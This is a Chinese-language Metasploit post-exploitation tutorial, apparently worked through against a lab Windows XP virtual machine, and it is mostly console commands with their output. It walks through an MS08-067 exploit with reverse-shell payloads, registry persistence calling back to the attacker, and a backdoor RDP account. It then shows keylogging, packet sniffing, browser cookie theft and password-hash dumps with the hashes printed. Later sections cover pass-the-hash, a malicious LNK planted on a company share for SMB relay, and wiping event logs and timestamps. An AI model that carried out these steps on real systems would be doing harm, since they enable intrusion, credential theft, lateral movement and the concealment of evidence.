后渗透
简单使用
普通session
此时已经获取到session1,以enum_drives后渗透模块为例:
msf6 exploit(windows/smb/ms08_067_netapi) > use post/windows/gather/forensics/enum_drives
msf6 post(windows/gather/forensics/enum_drives) > set session 1
session => 1
msf6 post(windows/gather/forensics/enum_drives) > run
# 即可获得磁盘分区情况
meterpreter
检查是否为虚拟机:
msf6 post(windows/gather/forensics/enum_drives) > use exploit/windows/smb/ms08_067_netapi
msf6 exploit(windows/smb/ms08_067_netapi) > set rhost 192.168.172.130
msf6 exploit(windows/smb/ms08_067_netapi) > set target 34
msf6 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > run
meterpreter > run post/windows/gather/checkvm
[*] Checking if ROOKIE8J-A4C239 is a Virtual Machine ...
[+] This is a VMware Virtual Machine
后渗透模块
persistence
写入注册表,并开机自启,间隔回连:
meterpreter > run persistence -X -i 5 -p 443 -r 192.168.172.136
# -X开机自启,-i反弹连接间隔时间,-p反弹连接本机的端口,-r回连地址
建立连接:
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.172.136
lhost => 192.168.172.136
msf6 exploit(multi/handler) > set lport 443
lport => 443
msf6 exploit(multi/handler) > run
目标重启后也会回弹meterpreter shell。
metsvc
将meterpreter 以系统服务的形式安装到目标主机:
meterpreter > run metsvc
会开启一个监听端口,等待连接。
getgui
meterpreter > run getgui -u metasploit -p meterpreter
# 将会在目标主机添加一个账号为metasploit,密码为meterpreter的用户,并开启3389(RDP服务)
# 如果对方在内网可以使用portwd 进行端口转发
提权
getsystem 命令
meterpreter的提权命令,集成了4种提权方式:
meterpreter > getsystem -h
Usage: getsystem [options]
Attempt to elevate your privilege to that of local system.
OPTIONS:
-h Help Banner.
-t <opt> The technique to use. (Default to '0').
0 : All techniques available
1 : Named Pipe Impersonation (In Memory/Admin)
2 : Named Pipe Impersonation (Dropper/Admin)
3 : Token Duplication (In Memory/Admin)
4 : Named Pipe Impersonation (RPCSS variant)
1和4分别是利用MS09-012 和MS10-015 中的漏洞,括号中的内容为(环境/权限)。
信息窃取
dumplinks 模块
用于查看最近使用的文件:
meterpreter > run post/windows/gather/dumplinks
运行较慢的原因是对每一个LNK文件,Metasploit都会在/root/.msf4/loot目录下生成对应记录文件,包含了这个LNK文件对应的原始文件位置、创建和修改时间等信息。
enum_applications 模块
获取目标主机安装的软件、安全更新和漏洞补丁信息:
meterpreter > run post/windows/gather/enum_applications
keyscan 命令
用于记录键盘敲击:
meterpreter > keyscan_start
# 开始记录
Starting the keystroke sniffer ...
meterpreter > keyscan_dump
# 显示已记录
Dumping captured keystrokes...
<LAlt><Delete><Left Windows>cmd<CR>
<CR>
<Shift>ipconfig<CR>
meterpreter > keyscan_stop
# 结束记录
Stopping the keystroke sniffer...
口令窃取
meterpreter > use sniffer
# 加载sniffer
Loading extension sniffer...Success.
meterpreter > help
# 查看sniffer帮助
Sniffer Commands
================
Command Description
------- -----------
sniffer_dump Retrieve captured packet data to PCAP file
sniffer_interfaces Enumerate all sniffable network interfaces
sniffer_release Free captured packets on a specific interface instead of downloading them
sniffer_start Start packet capture on a specific interface
sniffer_stats View statistics of an active capture
sniffer_stop Stop packet capture on a specific interface
网络嗅探
meterpreter > sniffer_interfaces
# 查看网卡
1 - 'VMware Accelerated AMD PCNet Adapter' ( type:0 mtu:1514 usable:true dhcp:true wifi:false )
meterpreter > sniffer_start 1
# 选择嗅探的网卡
[*] Capture started on interface 1 (50000 packet buffer)
meterpreter > sniffer_dump 1 /root/Desktop/interface1_sniffer.cap
# 导出已嗅探的内容
[*] Flushing packet capture buffer for interface 1...
[*] Flushed 290 packets (29979 bytes)
[*] Downloaded 100% (29979/29979)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to /root/Desktop/interface1_sniffer.cap
meterpreter > sniffer_stop 1
# 停止嗅探
[*] Capture stopped on interface 1
[*] There are 63 packets (5506 bytes) remaining
[*] Download or release them using 'sniffer_dump' or 'sniffer_release'
导出文件可直接利用WIRESHARK等工具查看:
浏览器嗅探
- enum_ie模块
读取ie浏览器历史记录、Cookie、缓存密码,并保存到本地。
meterpreter > run post/windows/gather/enum_ie
[*] IE Version: 6.0.2900.5512
[-] This module will only extract credentials for >= IE7
[*] Retrieving history.....
File: C:\Documents and Settings\rookie8j\Local Settings\History\History.IE5\index.dat
[*] Retrieving cookies.....
File: C:\Documents and Settings\rookie8j\Cookies\index.dat
[*] Looping through history to find autocomplete data....
[-] No autocomplete entries found in registry
[*] Looking in the Credential Store for HTTP Authentication Creds...
[*] Writing history to loot...
[+] Data saved in: /root/.msf4/loot/20201212025906_default_192.168.172.130_ie.history_602395.txt
[*] Writing cookies to loot...
[+] Data saved in: /root/.msf4/loot/20201212025906_default_192.168.172.130_ie.cookies_503272.txt
系统口令窃取
hashdump
meterpreter集成了hashdump:
meterpreter > hashdump
Administrator:500:b73a13e9b7832a35aad3b435b51404ee:afffeba176210fad4628f0524bfe1942:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:b2f7853c30c9809fba087b5c69bf8010:c9e91651a773e255d1dece9e33f1708d:::
rookie8j:1003:b73a13e9b7832a35aad3b435b51404ee:afffeba176210fad4628f0524bfe1942:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:6943f86ea17235a1f19eac0dfb947781:::
缺点:非system权限下会失败;Win7/Vista、Win2008进程移植可能不成功。
smart_hashdump 模块
弥补了hashdump缺点。
meterpreter > run windows/gather/smart_hashdump
[*] Running module against ROOKIE8J-A4C239
[*] Hashes will be saved to the database if one is connected.
[+] Hashes will be saved in loot in JtR password file format to:
[*] /root/.msf4/loot/20201212030506_default_192.168.172.130_windows.hashes_202408.txt
[*] Dumping password hashes...
[+] Administrator:500:b73a13e9b7832a35aad3b435b51404ee:afffeba176210fad4628f0524bfe1942
[+] HelpAssistant:1000:b2f7853c30c9809fba087b5c69bf8010:c9e91651a773e255d1dece9e33f1708d
[+] rookie8j:1003:b73a13e9b7832a35aad3b435b51404ee:afffeba176210fad4628f0524bfe1942
[+] SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:6943f86ea17235a1f19eac0dfb947781
内网拓展
内网转发
meterpreter > run get_local_subnets
# 获取本网段信息
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Local subnet: 192.168.172.0/255.255.255.0
meterpreter > background
[*] Backgrounding session 4...
msf6 exploit(multi/handler) > route add 192.168.172.0 255.255.255.0 4
# 将到目标网段的所有流量都经过目标会话(session 4)进行转发
[*] Route added
msf6 exploit(multi/handler) > route print
IPv4 Active Routing Table
=========================
Subnet Netmask Gateway
------ ------- -------
192.168.172.0 255.255.255.0 Session 4
[*] There are currently no IPv6 routes defined.
smb哈希传递攻击
假设已经获取到内网一台普通员工主机的hash值:
端口扫描:
msf6 > db_nmap -sS -p 445 192.168.172.0/24
发现了一台服务器192.168.172.136开启了smb,利用此员工的hash值进行hash传递攻击:
msf6 > use exploit/windows/smb/psexec
msf6 exploit(windows/smb/psexec) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > set lhost 192.168.172.136
# 本机ip
msf6 exploit(windows/smb/psexec) > set lport 443
# 本机侦听端口
msf6 exploit(windows/smb/psexec) > set rhosts 192.168.172.131
# 目标服务器
msf6 exploit(windows/smb/psexec) > set smbpass b73a13e9b7832a35aad3b435b51404ee:afffeba176210fad4628f0524bfe1942
# 员工hash值
msf6 exploit(windows/smb/psexec) > run
此时本机开始侦听:
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.172.136
msf6 exploit(multi/handler) > set lport 443
msf6 exploit(multi/handler) > run
一旦员工利用hash值访问服务器smb,服务器就会反弹一个meterpreter shell给本机。
MS08-068 配合MS10-046
此时已获得一个session的情况下:
msf6 post(windows/escalate/droplnk) > set lhost 192.168.172.136
# 设置本机ip
msf6 post(windows/escalate/droplnk) > set session 4
# 设置会话
msf6 post(windows/escalate/droplnk) > run
[*] Creating evil LNK
[*] Done. Writing to disk - C:\Documents and Settings\rookie8j\Words.lnk
# 会生成一个Words.lnk文件
[*] Done. Wait for evil to happen..
[*] Post module execution completed
搭建smb服务:
msf6 post(windows/escalate/droplnk) > use windows/smb/smb_relay
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/smb_relay) > set srvhost 192.168.172.136
# 设置本机ip
msf6 exploit(windows/smb/smb_relay) > set payload windows/meterpreter/reverse_tcp
# 设置meterpreter payload
msf6 exploit(windows/smb/smb_relay) > set lhost 192.168.172.136
# 设置本机ip
msf6 exploit(windows/smb/smb_relay) > run
# 启动smb服务
将Words.lnk文件复制到一个公司共享文件夹内,等待其他用户访问,就会连接到本机smb服务,获得一个meterpreter shell。
湮灭行踪
clearev命令
清除日志:
meterpreter > clearev
[*] Wiping 535 records from Application...
[*] Wiping 65 records from System...
[*] Wiping 1 records from Security...
timestomp命令
修改文件时间。
meterpreter > timestomp 1.txt -f 2.txt
# 将前者时间修改为与后者一样